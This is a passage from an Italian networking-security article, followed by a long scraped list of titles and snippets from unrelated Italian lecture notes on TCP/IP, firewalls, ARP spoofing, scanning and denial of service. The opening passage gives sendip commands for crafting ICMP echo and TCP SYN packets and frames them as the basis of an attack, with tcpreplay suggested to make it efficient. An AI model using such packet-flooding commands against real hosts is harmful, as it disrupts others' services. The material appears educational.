protocolli separati. Per spedire il traffi co TCP, bisogna caricare prima il modulo IP (-p ipv4... -p tcp). I parametri dei protocolli concreti vanno inseriti tramite chiavi aggiuntive. I più importanti (dal nostro punto di vista) parametri IPv4 (opzione -p ipv4) sono: -is indirizzo indirizzo di partenza, -id indirizzo indirizzo d arrivo. I parametri più importanti TCP (-p tcp) sono: -ts porta d uscita, -td porta d arrivo, -tfs 1/0 il controllo della fl ag SYN (attiva volutamente!). I parametri più impotranti ICMP (-p icmp) sono: -ct typ tipo del messaggio ICMP (volutamente echo request). Ecco un esempio dell invio del pacchetto echo request all indirizzo: # sendip -p ipv4 -is \ -p icmp Il pacchetto TCP SYN allo stesso indirizzo, con porta d arrivo 7000, può essere inviato in questo modo: # sendip -p ipv4 -is \ -p tcp -td 7000 Il programma sendip invia il pacchetto, dopodiché fi nisce il lavoro. Per organizzare un attacco possiamo scrivere un semplice script shell, ma la sua effi cienza darà molto a desiderare, quindi utilizzeremo un altro strumento. Suggeriamo l utilizzo del programma tcreplay (http:// tcpreplay.sourceforge.net) il quale tiene conto del traffi co in rete registrato da tcpdump. Un esempio concreto di realizzazione di un attacco del genere lo lasciamo come esercizio ai nostri lettori più curiosi. 19

UDP. Livello di Trasporto. Demultiplexing dei Messaggi. Esempio di Demultiplexing

UDP. Livello di Trasporto. Demultiplexing dei Messaggi. Esempio di Demultiplexing a.a. 2002/03 Livello di Trasporto UDP Descrive la comunicazione tra due dispositivi Fornisce un meccanismo per il trasferimento di dati tra sistemi terminali (end user) Prof. Vincenzo Auletta auletta@dia.unisa.it

Dettagli

Elementi sull uso dei firewall

Elementi sull uso dei firewall Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall

Dettagli

Network Intrusion Detection

Network Intrusion Detection Network Intrusion Detection Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica e di Ingegneria dell Informazione e delle Telecomunicazioni Analisi del traffico E importante analizzare

Dettagli

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando Comandi di Rete Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando PING: verifica la comunicazione tra due pc Il comando ping consente di verificare la connettività a livello

Dettagli

Il firewall Packet filtering statico in architetture avanzate

Il firewall Packet filtering statico in architetture avanzate protezione delle reti Il firewall Packet filtering statico in architetture avanzate FABIO GARZIA DOCENTE ESPERTO DI SECURITY UN FIREWALL PERIMETRALE È IL PUNTO CENTRALE DI DIFESA NEL PERIMETRO DI UNA RETE

Dettagli

Internet e protocollo TCP/IP

Internet e protocollo TCP/IP Internet e protocollo TCP/IP Internet Nata dalla fusione di reti di agenzie governative americane (ARPANET) e reti di università E una rete di reti, di scala planetaria, pubblica, a commutazione di pacchetto

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione Le Reti di Calcolatori (parte 2) Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Docente: Daniela

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione Le Reti di Calcolatori (parte 2) Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Docente: Daniela

Dettagli

TECNOLOGIE E PROGETTAZIONE DI SISTEMI INFORMATICI E DI TELECOMUNICAZIONI

TECNOLOGIE E PROGETTAZIONE DI SISTEMI INFORMATICI E DI TELECOMUNICAZIONI TECNOLOGIE E PROGETTAZIONE DI SISTEMI INFORMATICI E DI TELECOMUNICAZIONI Confronto tra ISO-OSI e TCP/IP, con approfondimento di quest ultimo e del livello di trasporto in cui agiscono i SOCKET. TCP/IP

Dettagli

Uso di sniffer ed intercettazione del traffico IP

Uso di sniffer ed intercettazione del traffico IP Uso di sniffer ed intercettazione del traffico IP Massimo Bernaschi Istituto per le Applicazioni del Calcolo Mauro Picone Consiglio Nazionale delle Ricerche Viale del Policlinico, 137-00161 Rome - Italy

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Protocolli di Comunicazione

Protocolli di Comunicazione Protocolli di Comunicazione La rete Internet si è sviluppata al di fuori dal modello ISO-OSI e presenta una struttura solo parzialmente aderente al modello OSI. L'architettura di rete Internet Protocol

Dettagli

Gestione degli indirizzi

Gestione degli indirizzi Politecnico di Milano Advanced Network Technologies Laboratory Gestione degli indirizzi - Address Resolution Protocol (ARP) - Reverse Address Resolution Protocol (RARP) - Dynamic Host Configuration Protocol

Dettagli

Cos è. Protocollo TCP/IP e indirizzi IP. Cos è. Cos è

Cos è. Protocollo TCP/IP e indirizzi IP. Cos è. Cos è Protocollo TCP/IP e indirizzi IP Il protocollo TCP/IP è alla base dei sistemi di trasmissione dati impiegati sulle reti locali e su Internet. Nato nel Gennaio 1983 negli Stati Uniti come sistema di comunicazione

Dettagli

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client Seconda esercitazione Sommario Configurazione della rete con DHCP Funzionamento Configurazione lato server Configurazione lato client 2 Sommario Test di connettività ping traceroute Test del DNS nslookup

Dettagli

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori a.a. 2009/10

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori a.a. 2009/10 Corso di Laurea in Ingegneria Informatica Corso di Reti di Calcolatori a.a. 2009/10 Roberto Canonico (roberto.canonico@unina.it) Antonio Pescapè (pescape@unina.it) ICMP ARP RARP DHCP - NAT ICMP (Internet

Dettagli

Sicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11

Sicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11 1 Mattia Lezione IV: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

Gestione degli indirizzi

Gestione degli indirizzi Politecnico di Milano Facoltà di Ingegneria dell Informazione Gestione degli indirizzi -Address Resolution Protocol (ARP) -Reverse Address Resolution Protocol (RARP) -Dynamic Host Configuration Protocol

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

5. Traduzione degli indirizzi di rete in indirizzi fisici: ARP

5. Traduzione degli indirizzi di rete in indirizzi fisici: ARP 5. Traduzione degli indirizzi di rete in indirizzi fisici: ARP 5.1. Introduzione Due macchine si parlano solo se conoscono l'indirizzo fisico di sottorete Due applicazioni si parlano solo se conoscono

Dettagli

Sicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning

Sicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione V: Scansioni Port a.a. 2015/16 1 cba 2011 15 M.. Creative Commons

Dettagli

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole

Dettagli

TCP: trasmissione Source port [16 bit] - Identifica il numero di porta sull'host mittente associato alla connessione TCP. Destination port [16 bit] - Identifica il numero di porta sull'host destinatario

Dettagli

Reti di Calcolatori. Il software

Reti di Calcolatori. Il software Reti di Calcolatori Il software Lo Stack Protocollare Application: supporta le applicazioni che usano la rete; Transport: trasferimento dati tra host; Network: instradamento (routing) di datagram dalla

Dettagli

Scheda di approfondimento gioco La Rete Internet

Scheda di approfondimento gioco La Rete Internet Scheda di approfondimento gioco La Rete Internet Che cos è Internet Internet è una rete mondiale di computer connessi tra loro. I cavi di rete che collegano i computer possono trasportare una maggiore

Dettagli

Reti di Telecomunicazioni Mobile IP Mobile IP Internet Internet Protocol header IPv4 router host indirizzi IP, DNS URL indirizzo di rete

Reti di Telecomunicazioni Mobile IP Mobile IP Internet Internet Protocol header IPv4 router host indirizzi IP, DNS URL indirizzo di rete IP Analizziamo con sufficiente dettaglio il sistema denominato IP, usato per consentire a due computer mobili di spostarsi liberamente in altre reti pur mantenendo lo stesso indirizzo IP. In particolare,

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

ARP SPOOFING - Papaleo Gianluca

ARP SPOOFING - Papaleo Gianluca ARP SPOOFING - Papaleo Gianluca ARP spoofing è un attacco che può essere effettuato solo dall interno di una rete locale o LAN (Local Area Network). Questa tecnica si basa su alcune caratteristiche di

Dettagli

Internet. Introduzione alle comunicazioni tra computer

Internet. Introduzione alle comunicazioni tra computer Internet Introduzione alle comunicazioni tra computer Attenzione! Quella che segue è un introduzione estremamente generica che ha il solo scopo di dare un idea sommaria di alcuni concetti alla base di

Dettagli

Sicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti.

Sicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti. 1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione IV: Scansioni Port a.a. 2011/12 1 c 2011 12 M.. Creative Commons Attribuzione-Condividi

Dettagli

10. Stratificazione dei protocolli

10. Stratificazione dei protocolli 10. Stratificazione dei protocolli 10.1. Introduzione Abbiamo visto la struttura dell'internet. Ora dobbiamo esaminare la struttura del restante software di comunicazione, che è organizzato secondo il

Dettagli

TCP/IP. Principali caratteristiche

TCP/IP. Principali caratteristiche TCP/IP Principali caratteristiche 1 TCP/IP Caratteristiche del modello TCP/IP Struttura generale della rete Internet IL MONDO INTERNET Reti nazionali e internazionali ROUTER Rete Azienade ROUTER ROUTER

Dettagli

Il livello Network del TCP/IP. Il protocollo IP (versione 4)

Il livello Network del TCP/IP. Il protocollo IP (versione 4) Il livello Network del TCP/IP. Il protocollo IP (versione 4) L architettura TCP/IP (il cui nome più preciso è ) è formata da diversi componenti, che si posizionano nello stack dei protocolli a partire

Dettagli

Corso di Sistemi di Elaborazione delle informazioni. Reti di calcolatori 2 a lezione a.a. 2009/2010 Francesco Fontanella

Corso di Sistemi di Elaborazione delle informazioni. Reti di calcolatori 2 a lezione a.a. 2009/2010 Francesco Fontanella Corso di Sistemi di Elaborazione delle informazioni Reti di calcolatori 2 a lezione a.a. 2009/2010 Francesco Fontanella Una definizione di Rete Una moderna rete di calcolatori può essere definita come:

Dettagli

IP Internet Protocol

IP Internet Protocol IP Internet Protocol Vittorio Maniezzo Università di Bologna Vittorio Maniezzo Università di Bologna 13 IP - 1/20 IP IP è un protocollo a datagrammi In spedizione: Riceve i dati dal livello trasporto e

Dettagli

Informazioni Generali (1/2)

Informazioni Generali (1/2) Prima Esercitazione Informazioni Generali (1/2) Ricevimento su appuntamento (tramite e-mail). E-mail d.deguglielmo@iet.unipi.it specificare come oggetto Reti Informatiche 2 Informazioni Generali (2/2)

Dettagli

Classe bit: 0 1 2 3 4 8 16 24 31. 0 net id host id. 1 0 net id host id. 1 1 0 net id host id. 1 1 1 0 multicast address

Classe bit: 0 1 2 3 4 8 16 24 31. 0 net id host id. 1 0 net id host id. 1 1 0 net id host id. 1 1 1 0 multicast address CAPITOLO 11. INDIRIZZI E DOMAIN NAME SYSTEM 76 Classe bit: 0 1 2 3 4 8 16 24 31 A B C D E 0 net id host id 1 0 net id host id 1 1 0 net id host id 1 1 1 0 multicast address 1 1 1 1 0 riservato per usi

Dettagli

Transmission Control Protocol

Transmission Control Protocol Transmission Control Protocol Franco Callegati Franco Callegati IC3N 2000 N. 1 Transmission Control Protocol - RFC 793 Protocollo di tipo connection-oriented Ha lo scopo di realizzare una comunicazione

Dettagli

Il computer: primi elementi

Il computer: primi elementi Il computer: primi elementi Tommaso Motta T. Motta Il computer: primi elementi 1 Informazioni Computer = mezzo per memorizzare, elaborare, comunicare e trasmettere le informazioni Tutte le informazioni

Dettagli

L architettura di TCP/IP

L architettura di TCP/IP L architettura di TCP/IP Mentre non esiste un accordo unanime su come descrivere il modello a strati di TCP/IP, è generalmente accettato il fatto che sia descritto da un numero di livelli inferiore ai

Dettagli

Modulo 1.3 Reti e servizi

Modulo 1.3 Reti e servizi Modulo 1.3 Reti e servizi 1. Introduzione al Networking Connettere il PC in rete; schede di rete e modem; Panoramica sulle reti ad alta velocita' e reti dial-up; Testare la connettivita' con ping; Introduzione

Dettagli

Cercare è per metà trovare

Cercare è per metà trovare Introduzione Cercare è per metà trovare Cercare su Internet Un Web nella Rete Struttura del libro I n t r o d u z i o n e La prima edizione del libro che avete tra le mani nasceva nel 2005. Si trattava

Dettagli

Livello di Rete. Gaia Maselli maselli@di.uniroma1.it

Livello di Rete. Gaia Maselli maselli@di.uniroma1.it Livello di Rete Gaia Maselli maselli@di.uniroma1.it Queste slide sono un adattamento delle slide fornite dal libro di testo e pertanto protette da copyright. All material copyright 1996-2007 J.F Kurose

Dettagli

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Modulo 8 Ethernet Switching

Modulo 8 Ethernet Switching Modulo 8 Ethernet Switching 8.1 Ethernet Switching 8.1.1 Bridging a livello 2 Aumentando il numero di nodi su un singolo segmento aumenta la probabilità di avere collisioni e quindi ritrasmissioni. Una

Dettagli

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 5

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 5 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15 Parte II Lezione 5 Giovedì 19-03-2015 1 Intensità del traffico e perdita dei pacchetti La componente

Dettagli

La nascita di Internet

La nascita di Internet La nascita di Nel 1969 la DARPA (Defence Advanced Research Project Agency) studia e realizza la prima rete per la comunicazione tra computer (ARPAnet) fra 3 università americane ed 1 istituto di ricerca.

Dettagli

Identità sulla rete protocolli di trasmissione (TCP-IP) L architettura del sistema. Dal livello A al livello B

Identità sulla rete protocolli di trasmissione (TCP-IP) L architettura del sistema. Dal livello A al livello B Identità sulla rete protocolli di trasmissione (TCP-IP) L architettura del sistema contenuto della comunicazione sistema per la gestione della comunicazione sottosistema C sottosistema B sottosistema A

Dettagli

Come si può notare ogni richiesta ICMP Echo Request va in timeout in

Come si può notare ogni richiesta ICMP Echo Request va in timeout in Comandi di rete Utility per la verifica del corretto funzionamento della rete: ICMP Nelle procedure viste nei paragrafi precedenti si fa riferimento ad alcuni comandi, come ping e telnet, per potere verificare

Dettagli

Vlan Relazione di Sistemi e Reti Cenni teorici

Vlan Relazione di Sistemi e Reti Cenni teorici Cosa sono le Vlan? Vlan Relazione di Sistemi e Reti Cenni teorici Le Vlan sono un tipo di rete particolare che permettono di creare tante reti logiche a partire da una singola rete fisica. Questo significa

Dettagli

Per essere inviato il dato deve essere opportunamente codificato in modo da poter essere trasformato in SEGNALE, elettrico oppure onda luminosa.

Per essere inviato il dato deve essere opportunamente codificato in modo da poter essere trasformato in SEGNALE, elettrico oppure onda luminosa. La trasmissione dell informazione N.R2 La comunicazione tra due calcolatori si realizza tramite lo scambio di dati su un canale di comunicazione, esiste quindi un TRASMETTITORE che invia dei dati e un

Dettagli

Internet, così come ogni altra rete di calcolatori possiamo vederla suddivisa nei seguenti componenti:

Internet, così come ogni altra rete di calcolatori possiamo vederla suddivisa nei seguenti componenti: Pagina 1 di 8 Struttura di Internet ed il livello rete Indice Struttura delle reti Estremità della rete Il nucleo della rete Reti a commutazione di pacchetto e reti a commutazione di circuito Funzionalità

Dettagli

ARCHIVIA PLUS: ARCHIPROTO PEC

ARCHIVIA PLUS: ARCHIPROTO PEC ARCHIVIA PLUS: ARCHIPROTO PEC Istruzioni per la configurazione e l utilizzo del modulo di protocollazione PEC Versione n. 2012.05.25 Data : 25/05/2012 Redatto da: Veronica Gimignani Luca Mattioli Approvato

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 200, ore 1.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:

Dettagli

IP (Internet Protocol) sta al livello 2 della scala Tcp/Ip o al livello 3 della scala ISO/OSI. Un indirizzo IP identifica in modo logico (non fisico

IP (Internet Protocol) sta al livello 2 della scala Tcp/Ip o al livello 3 della scala ISO/OSI. Un indirizzo IP identifica in modo logico (non fisico IP e subnetting Ip IP (Internet Protocol) sta al livello 2 della scala Tcp/Ip o al livello 3 della scala ISO/OSI. Un indirizzo IP identifica in modo logico (non fisico come nel caso del MAC Address) una

Dettagli

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 1

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 1 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15 Parte II Lezione 1 Giovedì 5-03-2015 TESTO DI RIFERIMENTO RETI DI CALCOLATORI E INTERNET un

Dettagli

Il Web Server e il protocollo HTTP

Il Web Server e il protocollo HTTP Corso PHP Parte 2 Il Web Server e il protocollo HTTP E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta la esegue e restituisce il risultato al browser,

Dettagli

Parte II: Reti di calcolatori Lezione 21

Parte II: Reti di calcolatori Lezione 21 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II: Reti di calcolatori Lezione 21 Giovedì 15-05-2014 1 Protocolli a turno

Dettagli

PATENTE EUROPEA DEL COMPUTER 4.0 MODULO

PATENTE EUROPEA DEL COMPUTER 4.0 MODULO PATENTE EUROPEA DEL COMPUTER 4.0 MODULO 2 Uso del Computer e Gestione dei file ( Windows XP ) A cura di Mimmo Corrado MODULO 2 - USO DEL COMPUTER E GESTIONE DEI FILE 2 FINALITÁ Il Modulo 2, Uso del computer

Dettagli

LAN. Coassiale Doppino Fibra ottica

LAN. Coassiale Doppino Fibra ottica LAN Il cablaggio Tralascio la stesa dei cavi, in quanto per tale operazione basta una conoscenza di base di elettricità e tanta pazienza. Passiamo invece al tipo di supporto da utilizzare per realizzare

Dettagli

Introduzione (parte III)

Introduzione (parte III) Introduzione (parte III) Argomenti della lezione Ripasso degli argomenti del primo corso: il livello di trasporto, il meccanismo di controllo delle congestioni e le applicazioni Il livello di trasporto

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

INDICE PROGRAMMA CORSO

INDICE PROGRAMMA CORSO INDICE PROGRAMMA CORSO PRIMA LEZIONE: Componenti di un computer: Hardware, Software e caratteristiche delle periferiche. SECONDA LEZIONE: Elementi principali dello schermo di Windows: Desktop, Icone, Mouse,

Dettagli

MC-link Lan+ Connessione e configurazione del router PRESTIGE 100

MC-link Lan+ Connessione e configurazione del router PRESTIGE 100 MC-link Lan+ Connessione e configurazione del router PRESTIGE 100 Per la connessione del router PRESTIGE 100 ad un singolo computer è sufficiente rispettare il seguente schema: La connessione tra cavo

Dettagli

Parte II: Reti di calcolatori Lezione 16

Parte II: Reti di calcolatori Lezione 16 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II: Reti di calcolatori Lezione 16 Giovedì 24-04-2014 1 Traduzione degli

Dettagli

Configurare una rete con PC Window s 98

Configurare una rete con PC Window s 98 Configurare una rete con PC Window s 98 In estrema sintesi, creare una rete di computer significa: realizzare un sistema di connessione tra i PC condividere qualcosa con gli altri utenti della rete. Anche

Dettagli

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14. Pietro Frasca. Parte II Lezione 4

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14. Pietro Frasca. Parte II Lezione 4 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II Lezione 4 Giovedì 13-03-2014 1 Ritardi e perdite nelle reti a commutazione

Dettagli

Tipologie e metodi di attacco

Tipologie e metodi di attacco Tipologie e metodi di attacco Tipologie di attacco Acquisizione di informazioni L obiettivo è quello di acquisire informazioni, attraverso l intercettazione di comunicazioni riservate o ottenendole in

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 3/2008 Il bollettino può essere

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Il protocollo TCP. Obiettivo. Procedura

Il protocollo TCP. Obiettivo. Procedura Il protocollo TCP Obiettivo In questo esercizio studieremo il funzionamento del protocollo TCP. In particolare analizzeremo la traccia di segmenti TCP scambiati tra il vostro calcolatore ed un server remoto.

Dettagli

Introduzione al TCP/IP Indirizzi IP Subnet Mask Frame IP Meccanismi di comunicazione tra reti diverse Classi di indirizzi IP Indirizzi IP privati e

Introduzione al TCP/IP Indirizzi IP Subnet Mask Frame IP Meccanismi di comunicazione tra reti diverse Classi di indirizzi IP Indirizzi IP privati e TCP/IP Sommario Introduzione al TCP/IP Indirizzi IP Subnet Mask Frame IP Meccanismi di comunicazione tra reti diverse Classi di indirizzi IP Indirizzi IP privati e pubblici Introduzione al TCP/IP TCP/IP

Dettagli

Internet Control Message Protocol ICMP. Struttura di un Messaggio ICMP. Segnalazione degli Errori

Internet Control Message Protocol ICMP. Struttura di un Messaggio ICMP. Segnalazione degli Errori I semestre 03/04 Internet Control Message Protocol ICMP Comunica messaggi di errore o altre situazioni che richiedono intervento Errore di indirizzo o di istradamento Congestione in un router Richiesta

Dettagli

Man-in-the-middle su reti LAN

Man-in-the-middle su reti LAN Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica 21 Marzo 2011 Scaletta 1 2 LAN switched ARP Alcuni attacchi MITM 3 4 5 Che cos è L attacco man-in-the-middle

Dettagli

MODELLI ISO/OSI e TCP/IP

MODELLI ISO/OSI e TCP/IP D. Talia RETI DI CALCOLATORI - UNICAL 1 Reti di Calcolatori MODELLI ISO/OSI e TCP/IP D. Talia RETI DI CALCOLATORI - UNICAL 2 Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto

Dettagli

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8 Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8 Livelli di rete e architettura Client-Server Lez 12 architettura client-server 1 Scorsa lezione: comunicazione Gli utenti chiedono comunicazione

Dettagli

PARTE 1 richiami. SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet )

PARTE 1 richiami. SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet ) PARTE 1 richiami SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet ) Parte 1 Modulo 1: Stack TCP/IP TCP/IP Protocol Stack (standard de facto) Basato su 5 livelli invece che sui 7 dello stack ISO/OSI Application

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:

Dettagli

Reti di computer. Tecnologie ed applicazioni

Reti di computer. Tecnologie ed applicazioni Reti di computer Tecnologie ed applicazioni Da I.T a I.C.T Con I.T (Information Tecnology) si intende il trattamento delle informazioni attraverso il computer e le nuove apparecchiature tecnologiche ad

Dettagli

SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet )

SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet ) PARTE 2 SUITE PROTOCOLLI TCP/IP ( I protocolli di Internet ) Parte 2 Modulo 1: Stack TCP/IP TCP/IP Protocol Stack (standard de facto) Basato su 5 livelli invece che sui 7 dello stack ISO/OSI Application

Dettagli

Reti standard. Si trattano i modelli di rete su cui è basata Internet

Reti standard. Si trattano i modelli di rete su cui è basata Internet Reti standard Si trattano i modelli di rete su cui è basata Internet Rete globale Internet è una rete globale di calcolatori Le connessioni fisiche (link) sono fatte in vari modi: Connessioni elettriche

Dettagli

IL LIVELLO RETE IN INTERNET Protocollo IP

IL LIVELLO RETE IN INTERNET Protocollo IP Reti di Calcolatori IL LIVELLO RETE IN INTERNET Protocollo IP D. Talia RETI DI CALCOLATORI - UNICAL 4-1 Il Protocollo IP IPv4 Datagram IP: formato Indirizzi IP: formato Protocolli di controllo IP mobile

Dettagli

Anatomia del Denial of Service

Anatomia del Denial of Service Anatomia del Denial of Service Testo di Luca Fortunato realizzato nell'ambito del corso di Laurea in Informatica. 1 INTRODUZIONE Il Denial of Service (D.o.S.) è un tipo di attacco che ha lo scopo di mettere

Dettagli

rsystem Maximiliano Marchesi maximiliano.marchesi@studenti.unipr.it

rsystem Maximiliano Marchesi maximiliano.marchesi@studenti.unipr.it Maximiliano Marchesi 28 Settembre 2005 Diario delle Revisioni Revisione 1.2 28 Settembre 2005 maximiliano.marchesi@studenti.unipr.it Sommario Introduzione..................................................................................

Dettagli

Manuale di Desktop Sharing. Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci

Manuale di Desktop Sharing. Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci Brad Hards Traduzione: Luciano Montanaro Traduzione: Daniele Micci 2 Indice 1 Introduzione 5 2 Il protocollo Remote Frame Buffer 6 3 Uso di Desktop Sharing 7 3.1 Gestione degli inviti di Desktop Sharing.........................

Dettagli

ARP/RARP. Problema della Risoluzione dell Indirizzo. Corrispondenza statica e dinamica. Scenari

ARP/RARP. Problema della Risoluzione dell Indirizzo. Corrispondenza statica e dinamica. Scenari ARP/RARP Università degli studi di Salerno Laurea in Informatica I semestre 03/04 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/professori/auletta/ 2 Problema della Risoluzione dell

Dettagli

Guida di Pro PC Secure

